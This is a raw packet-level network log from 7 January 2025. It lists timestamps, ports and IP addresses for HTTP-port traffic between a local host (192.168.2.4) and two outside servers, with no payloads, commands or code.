Jan 7, 2025 10:09:06.347946882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.347959995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.347970963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.347997904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348063946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348118067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348129988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348140955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348154068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348165989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348169088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348177910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348184109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348189116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348201990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348215103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348253965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348253965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348258018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348270893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348287106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348297119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348309040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348315001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348320961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348334074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348361015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.348371983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348371983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.348406076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.366997004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.367018938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.367050886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.367070913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.367085934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.367086887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.367098093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.367110014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.367113113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.367120028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.367149115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.367178917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400593996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400652885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400665045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400676966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400686979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400722027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400754929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400754929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400757074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400777102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400788069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400800943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400800943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400808096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400819063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400825024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400834084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400861979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400901079 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400928974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400940895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400974989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400985956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.400993109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.400993109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401038885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401056051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401067972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401072025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401114941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401134014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401151896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401158094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401169062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401180029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401190996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401201963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401216030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401232004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401268005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401273966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401287079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401297092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401308060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401319027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401319027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401333094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401361942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401361942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401401997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401427031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401454926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401462078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401468992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401480913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401493073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401493073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401509047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401525021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401525021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401561975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401773930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401787043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401817083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401827097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401834011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401838064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401885033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401896954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401897907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401910067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.401931047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.401976109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.467452049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:11.481846094 CET	50016	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:09:11.482204914 CET	50018	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:09:11.486880064 CET	80	50016	185.215.113.43	192.168.2.4
Jan 7, 2025 10:09:11.486948013 CET	80	50018	185.215.113.43	192.168.2.4
Jan 7, 2025 10:09:11.486957073 CET	50016	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:09:11.487023115 CET	50018	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:09:11.508027077 CET	50018	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:09:11.512819052 CET	80	50018	185.215.113.43	192.168.2.4
Jan 7, 2025 10:09:12.184135914 CET	80	50018	185.215.113.43	192.168.2.4
Jan 7, 2025 10:09:12.187330961 CET	50018	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:09:12.511156082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:12.511748075 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:12.516196012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:12.516525030 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:12.516623974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:12.516659021 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:12.588273048 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:12.593210936 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226731062 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226743937 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226878881 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226891041 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226918936 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226931095 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226931095 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.226946115 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226960897 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.226960897 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.226969957 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.226982117 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.227014065 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.227032900 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.227032900 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.227083921 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.231849909 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.231890917 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.231904984 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.231962919 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.231964111 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.231993914 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.232063055 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.347464085 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.347492933 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.347573996 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.347585917 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.347592115 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.347594023 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.347667933 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.347863913 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.347934008 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.347960949 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.348017931 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.348094940 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.348108053 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.348119020 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.348146915 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.348159075 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.348164082 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.348164082 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.348181009 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.348212004 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.348212004 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.348233938 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.348953009 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.348972082 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.349014997 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.349014997 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.349107981 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.349147081 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.349159956 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.349174023 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.349191904 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.349235058 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.349298000 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.349311113 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.349328041 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.349338055 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.349366903 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.350116968 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.350128889 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.350141048 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.350173950 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.350193024 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.352421045 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.352432966 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.352443933 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.352497101 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.352497101 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468276978 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468338013 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468349934 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468365908 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468370914 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468377113 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468398094 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468399048 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468431950 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468487024 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468647003 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468657970 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468667030 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468724966 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468724966 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468784094 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468795061 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468803883 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468849897 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468849897 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468911886 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468938112 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468947887 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.468969107 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.468978882 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469005108 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469013929 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469057083 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469214916 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469225883 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469235897 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469254017 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469269991 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469269991 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469285965 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469486952 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469496965 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469506025 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469542980 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469563007 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469621897 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469633102 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469643116 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469695091 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469695091 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469779968 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469794989 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469808102 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469820023 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469830036 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469835043 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469841957 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.469856024 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469892979 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.469892979 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470205069 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470220089 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470231056 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470253944 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470263958 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470268011 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470268011 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470298052 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470336914 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470562935 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470572948 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470582962 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470623016 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470632076 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470632076 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470633984 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470644951 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470684052 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470809937 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470819950 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470829964 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470839977 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470849037 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.470859051 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470899105 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.470899105 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.471158028 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.471174955 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.471201897 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.471201897 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.473244905 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.473268032 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.473278046 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.473304033 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.473335028 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.588807106 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.588830948 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.588854074 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.588866949 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.588876963 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.588885069 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.588896036 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.588907957 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.588979006 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589014053 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589021921 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589026928 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589042902 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589065075 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589066982 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589107037 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589127064 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589230061 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589282990 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589294910 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589303970 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589306116 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589363098 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589363098 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589385033 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589397907 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589409113 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.589458942 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.589458942 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590006113 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590017080 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590065002 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590080976 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590161085 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590173006 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590192080 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590218067 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590225935 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590218067 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590262890 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590276003 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590295076 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590306997 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590310097 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590317011 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590321064 CET	50019	80	192.168.2.4	31.41.244.11
